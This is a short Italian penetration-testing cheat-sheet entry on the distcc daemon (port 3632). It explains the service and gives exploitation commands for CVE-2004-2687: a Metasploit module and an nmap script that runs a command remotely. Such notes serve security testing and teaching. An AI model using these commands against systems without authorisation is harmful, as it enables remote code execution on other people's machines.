Informazioni di Base

Distcc è uno strumento che migliora il processo di compilazione utilizzando la potenza di elaborazione inattiva di altri computer nella rete. Quando distcc è configurato su una macchina, questa macchina è in grado di distribuire i suoi compiti di compilazione a un altro sistema. Questo sistema destinatario deve eseguire il daemon distccd e deve avere un compilatore compatibile installato per elaborare il codice inviato.

Porta predefinita: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Sfruttamento

Verificare se è vulnerabile a CVE-2004-2687 per eseguire codice arbitrario:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Non credo che shodan rilevi questo servizio.

Risorse

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post creato da Álex B (@r1p)